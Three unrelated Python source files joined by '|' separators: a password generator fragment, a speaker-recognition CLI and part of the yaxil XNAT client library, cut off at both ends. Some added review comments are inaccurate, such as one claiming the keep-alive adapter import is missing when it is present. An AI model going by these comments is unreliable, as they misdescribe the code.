        logging.warning("module 'secrets' is not installed")
    for _ in range(sampleLength):
        if use_secrets:
            sample += secrets.choice(sampleString)
        else:
            # Map two random bytes onto an index. NOTE(review): the modulo
            # introduces a slight bias unless len(sampleString) divides 65536.
            pos = int.from_bytes(os.urandom(2), 'big') % len(sampleString)
            sample += sampleString[pos]
    return sample
def rules(uppercase=0, lowercase=0, digits=0, special_characters=0):
    """Generate a password with the given number of uppercase, lowercase,
    digit and special (punctuation) characters, in shuffled order.

    Fix: the original had two adjacent triple-quoted strings; only the first
    became the docstring and the second was a dead expression statement.
    """
    password = ''
    if uppercase:
        password += randomSample(uppercase, string.ascii_uppercase)
    if lowercase:
        password += randomSample(lowercase, string.ascii_lowercase)
    if digits:
        password += randomSample(digits, string.digits)
    if special_characters:
        password += randomSample(special_characters, string.punctuation)
    # Shuffle so the categories are not emitted in fixed blocks.
    newpass = ''.join(random.sample(password, len(password)))
    return newpass
def generateFromRules(rulestring):
    """ Generate based on rules from a string similar to "4,5,2,5" """
    # The first four digit characters map to uppercase / lowercase / digits /
    # special counts; any further digits are ignored.
    counts = [0, 0, 0, 0]
    for idx, token in enumerate(filter(str.isdigit, rulestring)):
        if idx < 4:
            counts[idx] = int(token)
    return rules(*counts)
def generate(length=64):
    """ Generate password of specified len """
    # Split length evenly across the four categories; the remainder goes to
    # the special-characters bucket.
    base = length // 4
    return rules(base, base, base, base + (length % 4))
class KeeperPasswordGenerator:
    """Password generator honoring per-category minimum character counts."""

    def __init__(self, length: int, symbols: int, digits: int, caps: int, lower: int):
        # Negative counts contribute nothing to the required total.
        sum_categories = sum(max(n, 0) for n in (symbols, digits, caps, lower))
        if sum_categories == 0:
            # No positive category requested: default to one of each.
            symbols, digits, caps, lower, sum_categories = 1, 1, 1, 1, 4
        # Characters beyond the category minimums are drawn from the union of
        # all enabled category alphabets.
        extra_count = max(length - sum_categories, 0)
        self.category_map = [
            (symbols, PW_SPECIAL_CHARACTERS),
            (digits, string.digits),
            (caps, string.ascii_uppercase),
            (lower, string.ascii_lowercase),
        ]
        pool = ''.join(chars for count, chars in self.category_map if count > 0)
        self.category_map.append((extra_count, pool))

    def generate(self) -> str:
        """Return a freshly generated, shuffled password string."""
        chosen = []
        for count, alphabet in self.category_map:
            for _ in range(count):
                chosen.append(choice(alphabet))
        shuffle(chosen)
        return ''.join(chosen)
|
#!/usr/bin/env python3
import os
import sys
import itertools
import glob
import argparse
from utils import read_wav
from interface import ModelInterface
def get_args():
    """Parse the -t/--task, -i/--input and -m/--model command-line options."""
    desc = "Speaker Recognition Command Line Tool"
    epilog = """
Wav files in each input directory will be labeled as the basename of the directory.
Note that wildcard inputs should be *quoted*, and they will be sent to glob.glob module.
Examples:
    Train (enroll a list of person named person*, and mary, with wav files under corresponding directories):
    ./speaker-recognition.py -t enroll -i "/tmp/person* ./mary" -m model.out
    python ./speaker-recognition.py -t enroll -i "./datatrain/hang/ datatrain/hoai/ datatrain/huong/ datatrain/nhung/ datatrain/tuananh datatrain/murray datatrain/jenny" -m model.out
    Predict (predict the speaker of all wav files):
    ./speaker-recognition.py -t predict -i "./*.wav" -m model.out
    python ./speaker-recognition.py -t predict -i "datatest/*.wav" -m model.out
"""
    ap = argparse.ArgumentParser(
        description=desc, epilog=epilog,
        formatter_class=argparse.RawDescriptionHelpFormatter)
    ap.add_argument('-t', '--task', required=False,
                    help='Task to do. Either "enroll" or "predict"')
    ap.add_argument('-i', '--input', required=False,
                    help='Input Files(to predict) or Directories(to enroll)')
    ap.add_argument('-m', '--model', required=False,
                    help='Model file to save(in enroll) or use(in predict)')
    return ap.parse_args()
def task_enroll(input_dirs, output_model):
    """Enroll every .wav under each input directory into a new model.

    Each file is labeled with its directory's basename; the trained model is
    dumped to `output_model`. Exits with status 1 if no directory matches.
    """
    m = ModelInterface()
    # Space-separated list of (possibly wildcarded) directories.
    input_dirs = [os.path.expanduser(k) for k in input_dirs.strip().split()]
    dirs = itertools.chain(*(glob.glob(d) for d in input_dirs))
    dirs = [d for d in dirs if os.path.isdir(d)]
    # Fix: removed an unused `files = []` local.
    if len(dirs) == 0:
        print("No valid directory found!")
        sys.exit(1)
    for d in dirs:
        label = os.path.basename(d.rstrip('/'))
        wavs = glob.glob(d + '/*.wav')
        if len(wavs) == 0:
            print("No wav file found in %s" % (d))
            continue
        for wav in wavs:
            try:
                fs, signal = read_wav(wav)
                m.enroll(label, fs, signal)
                print("wav %s has been enrolled" % (wav))
            except Exception as e:
                # Best-effort: report the failing file and keep enrolling.
                print(wav + " error %s" % (e))
    m.train()
    m.dump(output_model)
# def task_predict(input_files, input_model):
# m = ModelInterface.load(input_model)
# for f in glob.glob(os.path.expanduser(input_files)):
# fs, signal = read_wav(f)
# label, score = m.predict(fs, signal)
# print (f, '->', label, ", score->", score)
def task_predict(path, input_model):
    """Predict the speaker of every .wav under `path` (recursively) and print accuracy.

    Ground truth for each file is taken from its parent directory's name.
    """
    m = ModelInterface.load(input_model)
    wav_files = []
    # Fix: previously named `sum`, shadowing the builtin.
    total, correct = 0, 0
    # r=root, d=directories, f = files
    for r, d, f in os.walk(path):
        for file in f:
            if '.wav' in file:
                wav_files.append(os.path.join(r, file))
    for f in wav_files:
        total += 1
        fs, signal = read_wav(f)
        label, score = m.predict(fs, signal)
        strPath = os.path.realpath(f)
        y_true = os.path.basename(os.path.dirname(strPath))
        if label == y_true:
            correct += 1
        print(f, '->', label, ", score->", score)
    # NOTE(review): raises ZeroDivisionError when no wav files are found —
    # confirm whether a guard is wanted.
    print('So file du doan dung: ', correct)
    print('Tong so file: ', total)
    print('accuracy: ', correct / total * 100, '%')
def Predict_ByFile(file, input_model):
    """Predict and return the speaker label for one wav file (prints debug info)."""
    print("start")
    model = ModelInterface.load(input_model)
    fs, signal = read_wav(file)
    print(fs)
    print(signal)
    label, score = model.predict(fs, signal)
    real_path = os.path.realpath(file)
    y_true = os.path.basename(os.path.dirname(real_path))
    print(label)
    print(score)
    return label
def OrderEnroll():
    """Enroll one recording into an existing model and save it under a new name.

    NOTE(review): model paths, the wav path and the speaker label are all
    hard-coded; this looks like a one-off/debug helper — confirm before reuse.
    """
    m = ModelInterface.load("model.out")
    fs, signal = read_wav("./GUI/TotalRecording/18082020202755.wav")
    # Label is the recording's timestamp-style basename.
    m.enroll("18082020202755", fs, signal)
    m.train()
    m.CheckEnroll()
    # Saved to a different file, leaving model.out untouched.
    m.dump("mo1.out")
# def task_predictgui(path, input_model):
# m = ModelInterface.load(input_model)
# f=glob.glob(path)
# fs, signal = read_wav(f[0])
# label, score = m.predict(fs, signal)
# return label
#
# if __name__ == "__main__":
# # global args
# # args = get_args()
# #
# # task = args.task
# #
# # if task == 'enroll':
# # task_enroll(args.input, args.model)
# #
# #
# # elif task == 'predict':
# # task_predict(args.input, args.model)
# # task_predict("datatest/*.wav", "model1.out")
# task_enroll("./Train/*","model.out")
#
# # task_predict("./Test", "model.out")
# Predict_ByFile("./GUI/TotalRecording/18082020202755.wav", "D:/doantotnghiep/Speaker_recognition/model.out")
# OrderEnroll() |
<filename>yaxil/__init__.py
import io
import os
import csv
import sys
import gzip
import json
import time
import arrow
import random
import sqlite3
import zipfile
import logging
import requests
from requests_toolbelt.adapters.socket_options import TCPKeepAliveAdapter
import itertools
import getpass as gp
import tempfile as tf
import subprocess as sp
import collections as col
from argparse import Namespace
from contextlib import contextmanager
import xml.etree.ElementTree as etree
import yaxil.commons as commons
import yaxil.functools as functools
from .session import Session
from .exceptions import (AuthError, MultipleAccessionError, NoAccessionError,
AccessionError, DownloadError, ResultSetError,
ScanSearchError, EQCNotFoundError, RestApiError,
AutoboxError, NoExperimentsError, NoSubjectsError,
CommandNotFoundError)
# Whether to verify SSL certificates. Primarily of use during testing.
CHECK_CERTIFICATE = True
# Module-level logger; quiet the chatty `requests` logger down to warnings.
logger = logging.getLogger(__name__)
logging.getLogger("requests").setLevel(logging.WARNING)
class Format(object):
    '''
    Possible XNAT response formats: Format.JSON, Format.XML, and Format.CSV.
    '''
    JSON = 'json'
    XML = 'xml'
    CSV = 'csv'
XnatAuth = col.namedtuple('XnatAuth', 'url username password')
'''
Container to hold XNAT authentication information. Fields include the ``url``,
``username``, and ``password``.
'''
def test_auth(auth):
    '''
    Validate auth input against XNAT.

    Issues a GET on the /data/version endpoint and returns False only when
    the server answers 401 Unauthorized; any other response counts as valid.
    NOTE(review): does not pass the module-level CHECK_CERTIFICATE setting to
    requests — confirm whether verify= should be forwarded here.
    '''
    url = '{0}/data/version'.format(auth.url.rstrip('/'))
    r = requests.get(url, auth=basicauth(auth))
    if r.status_code == requests.codes.UNAUTHORIZED:
        return False
    return True
def basicauth(auth):
    '''
    Create basic auth tuple for requests; None when credentials are incomplete.
    '''
    if not (auth.username and auth.password):
        return None
    return (auth.username, auth.password)
@contextmanager
def session(auth):
    '''
    Create a session context so authentication need not be passed to every call.

    Example:
    .. code-block:: python
        import yaxil
        auth = yaxil.XnatAuth(url='...', username='...', password='...')
        with yaxil.session(auth) as sess:
            aid = sess.accession('AB1234C')
            experiment = sess.experiment('AB1234C')
            sess.download('AB1234C', [1,3,14], out_dir='./dicomz')

    :param auth: XNAT authentication
    :type auth: :mod:`yaxil.XnatAuth`
    :returns: YAXIL session object
    :rtype: :mod:`yaxil.session.Session`
    '''
    yield Session(auth)
def auth2(alias=None, host=None, username=None, password=None, cfg='~/.xnat_auth'):
    '''
    Resolve XNAT authentication from, in order of precedence: an xnat_auth
    config file alias, explicit host/username/password arguments (prompting
    for the password when omitted), or the $XNAT_HOST, $XNAT_USER, and
    $XNAT_PASS environment variables.

    :param alias: xnat_auth alias
    :type alias: str
    :param host: XNAT URL
    :type host: str
    :param username: XNAT username
    :type username: str
    :param password: XNAT password; prompted for interactively when omitted
    :type password: str
    :param cfg: Configuration file
    :type cfg: str
    :returns: Named tuple of (url, username, password)
    :rtype: :mod:`yaxil.XnatAuth`
    :raises AuthError: if no complete set of credentials could be resolved
    '''
    import getpass  # local import: only needed when prompting for a password
    # First, look for authentication data in the xnat_auth config file
    if alias:
        logger.debug('returning authentication data from %s', cfg)
        return auth(alias)
    # Second, look for authentication data from host/username/password arguments
    authargs = (host, username)
    if any(authargs):
        if not all(authargs):
            raise AuthError('you must supply --host, --username and --password (or password prompt)')
        logger.debug('returning authentication data from command line')
        if not password:
            # fix: prompt for the password here; this line previously held an
            # unresolvable <PASSWORD> placeholder and was not valid Python
            password = getpass.getpass('Enter XNAT passphrase:')
        return XnatAuth(url=host, username=username, password=password)
    # Third, look for authentication data in environment variables
    host = os.environ.get('XNAT_HOST', None)
    username = os.environ.get('XNAT_USER', None)
    password = os.environ.get('XNAT_PASS', None)
    authargs = (host, username)
    if any(authargs):
        if not all(authargs):
            raise AuthError('you must set $XNAT_HOST, $XNAT_USER, and $XNAT_PASS (or password prompt)')
        logger.debug('returning authentication data from environment variables')
        if not password:
            password = getpass.getpass('Enter XNAT passphrase:')
        return XnatAuth(url=host, username=username, password=password)
    raise AuthError('you must provide authentication data using xnat_auth, command line, or environment variables')
def auth(alias=None, url=None, cfg="~/.xnat_auth"):
    '''
    Read connection details from an xnat_auth XML file
    Example:
    >>> import yaxil
    >>> auth = yaxil.auth('xnatastic')
    >>> auth.url, auth.username, auth.password
    ('https://www.xnatastic.org/', 'username', '********')
    :param alias: XNAT alias
    :type alias: str
    :param url: XNAT URL
    :type url: str
    :param cfg: Configuration file
    :type cfg: str
    :returns: Named tuple of (url, username, password)
    :rtype: :mod:`yaxil.XnatAuth`
    :raises ValueError: if neither or both of alias and url are given
    :raises AuthError: if the config file or a unique credential set is missing
    '''
    if not alias and not url:
        raise ValueError('you must provide an alias or url argument')
    if alias and url:
        raise ValueError('cannot provide both alias and url arguments')
    # check and parse config file
    cfg = os.path.expanduser(cfg)
    if not os.path.exists(cfg):
        raise AuthError("could not locate auth file %s" % cfg)
    tree = etree.parse(os.path.expanduser(cfg))
    # search by alias or url
    res = None
    if alias:
        res = tree.findall("./%s" % alias)
    if url:
        res = tree.findall("./*/[url='%s']" % url)
    if not res:
        raise AuthError("failed to locate xnat credentials within %s" % cfg)
    elif len(res) > 1:
        raise AuthError("found too many sets of credentials within %s" % cfg)
    res = res.pop()
    # get url
    url = res.findall("url")
    if not url:
        raise AuthError("no url for %s in %s" % (alias, cfg))
    elif len(url) > 1:
        raise AuthError("too many urls for %s in %s" % (alias, cfg))
    # get username
    username = res.findall("username")
    if not username:
        raise AuthError("no username for %s in %s" % (alias, cfg))
    elif len(username) > 1:
        raise AuthError("too many usernames for %s in %s" % (alias, cfg))
    # get password; prompt interactively if none is stored in the config file
    password = res.findall("password")
    if not password:
        import getpass  # local import: only needed when prompting
        # fix: this line previously held an unresolvable <PASSWORD> placeholder
        password = getpass.getpass('Enter XNAT passphrase:')
    elif len(password) > 1:
        raise AuthError("too many passwords for %s in %s" % (alias, cfg))
    else:
        password = password.pop().text
    return XnatAuth(
        url=url.pop().text,
        username=username.pop().text,
        password=password
    )
Subject = col.namedtuple('Subject', ['uri', 'label', 'id', 'project'])
'''
Container to hold XNAT Subject information. Fields include the Subject URI
(``uri``), Accession ID (``id``), Project (``project``), and Label (``label``).
'''
def subjects(auth, label=None, project=None):
    '''
    Retrieve Subject tuples for subjects returned by this function.
    Example:
    >>> import yaxil
    >>> auth = yaxil.XnatAuth(url='...', username='...', password='...')
    >>> yaxil.subjects(auth, 'AB1234C')
    Subject(uri=u'/data/experiments/XNAT_S0001', label=u'AB1234C', id=u'XNAT_S0001',
            project=u'MyProject')
    :param auth: XNAT authentication
    :type auth: :mod:`yaxil.XnatAuth`
    :param label: XNAT Subject label
    :type label: str
    :param project: XNAT Subject Project
    :type project: str
    :returns: Subject objects
    :rtype: :mod:`yaxil.Subject`
    '''
    url = '{0}/data/subjects'.format(auth.url.rstrip('/'))
    logger.debug('issuing http request %s', url)
    # compile query string
    columns = [
        'ID',
        'label',
        'project'
    ]
    payload = {
        'columns': ','.join(columns)
    }
    if label:
        payload['label'] = label
    if project:
        payload['project'] = project
    # submit the request
    r = requests.get(url, params=payload, auth=basicauth(auth),
                     verify=CHECK_CERTIFICATE)
    # validate response
    if r.status_code != requests.codes.ok:
        raise AccessionError('response not ok ({0}) from {1}'.format(r.status_code, r.url))
    try:
        results = r.json()
        __quick_validate(results)
    except ResultSetError as e:
        # fix: Python 3 exceptions have no .message attribute (PEP 352);
        # format the exception itself, which renders its message
        raise ResultSetError('{0} from {1}'.format(e, r.url)) from e
    results = results['ResultSet']
    if int(results['totalRecords']) == 0:
        raise NoSubjectsError('no records returned from {0}'.format(r.url))
    # start generating consumable results for the caller
    for item in results['Result']:
        yield Subject(uri=item['URI'],
                      id=item['ID'],
                      project=item['project'],
                      label=item['label'])
Experiment = col.namedtuple('Experiment', [
    'uri', 'label', 'id', 'project',
    'subject_id', 'subject_label', 'archived_date'
])
'''
Container to hold XNAT Experiment information. Fields include the Experiment URI
(``uri``), Accession ID (``id``), Project (``project``), Label (``label``),
Subject Accession ID (``subject_id``), Subject label (``subject_label``), and
archived date (``archived_date``).
'''
def experiments(auth, label=None, project=None, subject=None, daterange=None):
    '''
    Retrieve Experiment tuples for experiments returned by this function.
    Example:
    >>> import yaxil
    >>> auth = yaxil.XnatAuth(url='...', username='...', password='...')
    >>> yaxil.experiment(auth, 'AB1234C')
    Experiment(uri=u'/data/experiments/XNAT_E0001', label=u'AB1234C', id=u'XNAT_E0001',
               project=u'MyProject', subject_id=u'XNAT_S0001', subject_label='ABC')
    :param auth: XNAT authentication
    :type auth: :mod:`yaxil.XnatAuth`
    :param label: XNAT Experiment label
    :type label: str
    :param project: XNAT Experiment Project
    :type project: str
    :param subject: YAXIL Subject
    :type subject: :mod:`yaxil.Subject`
    :param daterange: Start and end dates
    :type daterange: tuple
    :returns: Experiment object
    :rtype: :mod:`yaxil.Experiment`
    '''
    if subject and (label or project):
        raise ValueError('cannot provide subject with label or project')
    url = '{0}/data/experiments'.format(auth.url.rstrip('/'))
    logger.debug('issuing http request %s', url)
    # compile query string
    columns = [
        'ID',
        'label',
        'project',
        'xnat:subjectassessordata/subject_id',
        'subject_label',
        'insert_date'
    ]
    payload = {
        'columns': ','.join(columns)
    }
    if label:
        payload['label'] = label
    if project:
        payload['project'] = project
    if subject:
        payload['project'] = subject.project
        payload['xnat:subjectassessordata/subject_id'] = subject.id
    if daterange:
        # XNAT expects an inclusive MM/DD/YYYY-MM/DD/YYYY date range
        start = arrow.get(daterange[0]).format('MM/DD/YYYY')
        stop = arrow.get(daterange[1]).format('MM/DD/YYYY')
        payload['date'] = '{0}-{1}'.format(start, stop)
    # submit request
    r = requests.get(url, params=payload, auth=basicauth(auth), verify=CHECK_CERTIFICATE)
    # validate response
    if r.status_code != requests.codes.ok:
        raise AccessionError('response not ok ({0}) from {1}'.format(r.status_code, r.url))
    try:
        results = r.json()
        __quick_validate(results)
    except ResultSetError as e:
        # fix: Python 3 exceptions have no .message attribute (PEP 352)
        raise ResultSetError('{0} from {1}'.format(e, r.url)) from e
    results = results['ResultSet']
    if int(results['totalRecords']) == 0:
        raise NoExperimentsError('no records returned for {0}'.format(r.url))
    for item in results['Result']:
        yield Experiment(uri=item['URI'],
                         id=item['ID'],
                         project=item['project'],
                         label=item['label'],
                         subject_id=item['subject_ID'],
                         subject_label=item['subject_label'],
                         archived_date=item['insert_date'])
@functools.lru_cache
def accession(auth, label, project=None):
    '''
    Look up the Accession ID for an Experiment label.
    Example:
    >>> import yaxil
    >>> auth = yaxil.XnatAuth(url='...', username='...', password='...')
    >>> yaxil.accession(auth, 'AB1234C')
    u'XNAT_E00001'
    :param auth: XNAT authentication
    :type auth: :mod:`yaxil.XnatAuth`
    :param label: XNAT Experiment label
    :type label: str
    :param project: XNAT Experiment Project
    :type project: str
    :returns: Accession ID
    :rtype: str
    '''
    matches = list(experiments(auth, label, project))
    if len(matches) > 1:
        raise MultipleAccessionError(f'label={label}, project={project}')
    return matches[0].id
def download(auth, label, scan_ids=None, project=None, aid=None,
             out_dir='.', in_mem=True, progress=False, attempts=1,
             out_format='flat'):
    '''
    Download scan data from XNAT.
    Example:
    >>> import yaxil
    >>> auth = yaxil.XnatAuth(url='...', username='...', password='...')
    >>> yaxil.download(auth, 'AB1234C', ['1', '2'], out_dir='./data')
    :param auth: XNAT authentication object
    :type auth: :mod:`yaxil.XnatAuth`
    :param label: XNAT MR Session label
    :type label: str
    :param scan_ids: Scan numbers to return; use None for all
    :type scan_ids: list
    :param project: XNAT MR Session project
    :type project: str
    :param aid: XNAT Accession ID
    :type aid: str
    :param out_dir: Output directory
    :type out_dir: str
    :param out_format: Extract all files ('flat') or leave native structure ('native')
    :type out_format: str
    :param in_mem: Keep download content in memory; faster but uses more memory
    :type in_mem: bool
    :param progress: Show download progress every N bytes
    :type progress: int
    :param attempts: Number of download attempts
    :type attempts: int
    :raises DownloadError: if the server never returns OK or the payload is a bad zip
    '''
    if not scan_ids:
        # XNAT interprets 'ALL' as every scan in the session
        scan_ids = ['ALL']
    if not aid:
        aid = accession(auth, label, project)
    # build the url
    url = "%s/data/experiments/%s/scans/%s/files?format=zip" % (auth.url.rstrip('/'),
        aid, ','.join([str(x) for x in scan_ids]))
    # issue the http request, with exponential backoff retry behavior
    backoff = 10
    for _ in range(attempts):
        logger.debug("issuing http request %s", url)
        s = requests.Session()
        # NOTE(review): TCPKeepAliveAdapter presumably comes from
        # requests_toolbelt (import not visible here) — keeps the connection
        # alive while the server assembles the zip; confirm the import
        keep_alive = TCPKeepAliveAdapter(idle=120, count=20, interval=30)
        s.mount('https://', keep_alive)
        r = s.get(url, stream=True,
                  auth=basicauth(auth), verify=CHECK_CERTIFICATE)
        logger.debug("response headers %s", r.headers)
        if r.status_code == requests.codes.ok:
            break
        # add random jitter so parallel clients don't retry in lock-step
        fuzz = random.randint(0, 10)
        logger.warning("download unsuccessful (%s), retrying in %s seconds", r.status_code,
                       backoff + fuzz)
        time.sleep(backoff + fuzz)
        backoff *= 2
    # if we still have a not-ok status at this point, the download failed
    if r.status_code != requests.codes.ok:
        raise DownloadError("response not ok (%s) from %s" % (r.status_code, r.url))
    # create output directory
    if not os.path.exists(out_dir):
        os.makedirs(out_dir)
    # keep response content in memory or write to a file (memory is obviously faster, but limited)
    if in_mem:
        content = io.BytesIO()
        logger.debug("response content will be read into memory")
    else:
        content = tf.NamedTemporaryFile(dir=out_dir, prefix="xnat", suffix=".zip")
        logger.debug("response content will be stored on disk %s", content.name)
    # progress indicator setup
    if progress:
        sys.stdout.write("reading response data: ")
        sys.stdout.flush()
    # read response content in chunks
    meter = 0
    chunk_size = 1024
    for chunk in r.iter_content(chunk_size=chunk_size):
        if progress and meter >= progress:
            # advance the spinner once every `progress` bytes
            sys.stdout.write(next(commons.spinner)); sys.stdout.flush()
            sys.stdout.write('\b')
            meter = 0
        content.write(chunk)
        meter += chunk_size
    # flush and fsync before moving on
    content.flush()
    try:
        os.fsync(content.fileno())
    except io.UnsupportedOperation:
        # in-memory BytesIO has no file descriptor; nothing to sync
        pass
    # progress indicator shut down
    if progress:
        sys.stdout.write('done.\n'); sys.stdout.flush()
    # load reponse content into a zipfile object
    try:
        zf = zipfile.ZipFile(content, allowZip64=True)
    except zipfile.BadZipfile:
        # preserve the bad payload on disk so it can be inspected post-mortem
        with tf.NamedTemporaryFile(dir=out_dir, prefix="xnat",
                                   suffix=".zip", delete=False) as fo:
            content.seek(0)
            fo.write(content.read())
            fo.flush()
            os.fsync(fo.fileno())
        raise DownloadError("bad zip file, written to %s" % fo.name)
    # finally extract the zipfile (with various nasty edge cases handled)
    logger.debug("extracting zip archive to %s", out_dir)
    if out_format == 'native':
        zf.extractall(path=out_dir)
    else: # out_format == 'flat' or out_format == '1.4'
        extract(zf, content, out_dir)
def extract(zf, content, out_dir='.'):
    '''
    Extracting a Java 1.6 XNAT ZIP archive in Python.
    :param zf: ZipFile object
    :type zf: zipfile.ZipFile
    :param content: File-like object holding the raw zip bytes; dumped to disk
                    for inspection when a member turns out to be corrupt
    :param out_dir: Output directory
    :type out_dir: str
    :raises DownloadError: if a member of the archive cannot be read
    '''
    previous_header_offset = 0
    # each 2^32-byte wrap-around adds another `value` bytes to later offsets
    compensation = Namespace(value=2**32, factor=0)
    for i,member in enumerate(zf.infolist()):
        '''
        Right... so when Java 1.6 produces a Zip filesystem that exceeds 2^32
        bytes, the Central Directory local file header offsets after the 2^32
        byte appear to overflow. The Python zipfile module then adds any
        unexpected bytes to each header offset thereafter. This attempts to fix
        that. My guess is that this comment might make perfect sense now, but
        will make aboslutely no sense in about a year.
        '''
        # undo concat padding added from zipfile.py:819
        if i == 0:
            concat = member.header_offset
        member.header_offset -= concat
        # if a header offset moves backward, add 2^32 bytes * factor
        if previous_header_offset > member.header_offset:
            compensation.factor += 1
        previous_header_offset = member.header_offset
        member.header_offset += compensation.value * compensation.factor
        # read the archive member into a bytes file-like object
        try:
            bio = io.BytesIO(zf.read(member.filename))
        except zipfile.BadZipfile:
            # preserve the raw payload on disk for post-mortem inspection
            with tf.NamedTemporaryFile(dir=out_dir, prefix="xnat",
                                       suffix=".zip", delete=False) as fo:
                content.seek(0)
                fo.write(content.read())
                fo.flush()
                os.fsync(fo.fileno())
            raise DownloadError("bad zip file, written to %s" % fo.name)
        # xnat archives may contain files that are gzipped without the .gz
        if not member.filename.endswith(".gz"):
            try:
                # if the payload decompresses cleanly, treat it as gzip
                gz = gzip.GzipFile(fileobj=bio, mode="rb")
                gz.read()
                bio = gz
            except IOError:
                # not gzip after all; fall through with the raw bytes
                pass
        # write the file out to the filesystem (flattened to its basename)
        bio.seek(0)
        f = os.path.join(out_dir, os.path.basename(member.filename))
        commons.atomic_write(f, bio.read(), encoding=False)
def __quick_validate(r, check=('ResultSet', 'Result', 'totalRecords')):
    '''
    Quick validation of JSON result set returned by XNAT.
    :param r: Result set data in JSON format
    :type r: dict
    :param check: Fields to check
    :type check: tuple
    :returns: Result set is valid
    :rtype: bool
    :raises ResultSetError: if a requested field is missing
    '''
    if 'ResultSet' in check and 'ResultSet' not in r:
        raise ResultSetError('no ResultSet in server response')
    # Result and totalRecords both live inside the ResultSet envelope
    for field in ('Result', 'totalRecords'):
        if field in check and field not in r['ResultSet']:
            raise ResultSetError('no %s in server response' % field)
    return True
def scansearch(auth, label, filt, project=None, aid=None):
    '''
    Search for scans by supplying a set of SQL-based conditionals.
    Example:
    >>> import yaxil
    >>> auth = yaxil.XnatAuth(url='...', username='...', password='...')
    >>> query = {
    ...   'eor1': "note LIKE %EOR1%",
    ...   'eor2': "note LIKE %EOR2%",
    ...   'mpr': "series_description='T1_MEMPRAGE RMS' OR note LIKE %ANAT%"
    ... }
    >>> yaxil.scansearch(auth, 'AB1234C', query)
    {"mpr": [4], "eor1": [13], "eor2": [14]}
    :param auth: XNAT authentication object
    :type auth: :mod:`yaxil.XnatAuth`
    :param label: XNAT MR Session label
    :type label: str
    :param filt: Scan search filter/query
    :type filt: dict
    :param project: XNAT MR Session project
    :type project: str
    :param aid: XNAT Accession ID
    :type aid: str
    :returns: Same dictionary that was passed in, but values are now matching scans
    :rtype: dict
    '''
    if not aid:
        aid = accession(auth, label, project)
    # fetch the scan listing for this accession as CSV
    url = "%s/data/experiments/%s/scans?format=csv" % (auth.url.rstrip('/'), aid)
    logger.debug("issuing http request %s", url)
    r = requests.get(url, auth=basicauth(auth), verify=CHECK_CERTIFICATE)
    if r.status_code != requests.codes.ok:
        raise ScanSearchError("response not ok (%s) from %s" % (r.status_code, r.url))
    if not r.content:
        raise ScanSearchError("response is empty from %s" % r.url)
    # parse the CSV payload; the first row is the column header
    reader = csv.reader(io.StringIO(r.content.decode()))
    header = next(reader)
    # load the rows into an in-memory sqlite table so the caller's SQL
    # conditionals can be evaluated against them
    conn = sqlite3.connect(":memory:")
    cur = conn.cursor()
    cur.execute("CREATE TABLE scans (%s)" % ','.join(header))
    insert = "INSERT INTO scans VALUES (%s)" % ','.join('?' * len(header))
    for row in reader:
        cur.execute(insert, [x for x in row])
    conn.commit()
    # evaluate each user-supplied filter and collect the matching scan ids
    result = col.defaultdict(list)
    for token, cond in filt.items():
        try:
            result[token] = [x[0] for x in cur.execute("SELECT ID FROM scans where %s" % cond)]
        except sqlite3.OperationalError:
            logger.critical("something is wrong with the filter: %s", cond)
            raise
    return result
def mrscans(auth, label=None, scan_ids=None, project=None, experiment=None):
    '''
    Get scan information for a MR Session as a sequence of dictionaries.
    Example:
    >>> import yaxil
    >>> import json
    >>> auth = yaxil.XnatAuth(url='...', username='...', password='...')
    >>> for scan in yaxil.mrscans(auth, 'AB1234C'):
    ...   print(json.dumps(scan, indent=2))
    :param auth: XNAT authentication object
    :type auth: :mod:`yaxil.XnatAuth`
    :param label: XNAT MR Session label
    :type label: str
    :param scan_ids: Scan numbers to return; None returns all
    :type scan_ids: list
    :param project: XNAT MR Session project
    :type project: str
    :param experiment: YAXIL Experiment
    :type experiment: :mod:`yaxil.Experiment`
    :returns: Generator of scan data dictionaries
    :rtype: dict
    '''
    if experiment and (label or project):
        raise ValueError('cannot supply experiment with label or project')
    if experiment:
        label, project = experiment.label, experiment.project
    aid = accession(auth, label, project)
    path = f'/data/experiments/{aid}/scans'
    params = {
        'columns': ','.join(mrscans.columns.keys())
    }
    _, response = _get(auth, path, 'json', autobox=True, params=params)
    for row in response['ResultSet']['Result']:
        # rows for non-MR scan types come back with an empty mrscandata id
        if not row['xnat:mrscandata/id']:
            continue
        # fix: identity comparison with None (was "scan_ids == None")
        if scan_ids is None or row['xnat:mrscandata/id'] in scan_ids:
            yield {v: row[k] for k, v in mrscans.columns.items()}
# Maps XNAT REST column names (keys) to the friendlier dictionary keys
# (values) yielded by mrscans().
mrscans.columns = {
    "ID": "ID",
    "insert_date": "date_archived",
    "insert_user": "archiver",
    "xnat:mrsessiondata/operator": "operator",
    "xnat:mrscandata/id": "id",
    "xnat:mrscandata/quality": "quality",
    "xnat:mrscandata/series_description": "series_description",
    "xnat:mrscandata/scanner": "scanner",
    "xnat:mrscandata/scanner/manufacturer": "scanner_manufacturer",
    "xnat:mrscandata/scanner/model": "scanner_model",
    "xnat:mrscandata/frames": "frames",
    "xnat:mrscandata/note": "note",
    "xnat:mrscandata/type": "type",
    "xnat:mrscandata/parameters/voxelres/x": "vox_x",
    "xnat:mrscandata/parameters/voxelres/y": "vox_y",
    "xnat:mrscandata/parameters/voxelres/z": "vox_z",
    "xnat:mrscandata/parameters/fov/x": "fov_x",
    "xnat:mrscandata/parameters/fov/y": "fov_y",
    "xnat:mrscandata/parameters/tr": "tr",
    "xnat:mrscandata/parameters/te": "te",
    "xnat:mrscandata/parameters/flip": "flip",
    "xnat:mrscandata/parameters/sequence": "sequence",
    "xnat:mrscandata/parameters/imagetype": "image_type",
    "xnat:mrscandata/parameters/scansequence": "scan_sequence",
    "xnat:mrscandata/parameters/seqvariant": "sequence_variant",
    "xnat:mrscandata/parameters/acqtype": "acquisition_type",
    "xnat:mrscandata/parameters/pixelbandwidth": "pix_bandwidth"
}
def srscans(auth, label=None, scan_ids=None, project=None, experiment=None):
    '''
    Get structured-report (xnat:srScanData) scan information for a session as
    a sequence of dictionaries. Mirrors :func:`mrscans`.
    :param auth: XNAT authentication object
    :type auth: :mod:`yaxil.XnatAuth`
    :param label: XNAT Session label
    :type label: str
    :param scan_ids: Scan numbers to return; None returns all
    :type scan_ids: list
    :param project: XNAT Session project
    :type project: str
    :param experiment: YAXIL Experiment
    :type experiment: :mod:`yaxil.Experiment`
    :returns: Generator of scan data dictionaries
    :rtype: dict
    '''
    if experiment and (label or project):
        raise ValueError('cannot supply experiment with label or project')
    if experiment:
        label, project = experiment.label, experiment.project
    aid = accession(auth, label, project)
    path = f'/data/experiments/{aid}/scans'
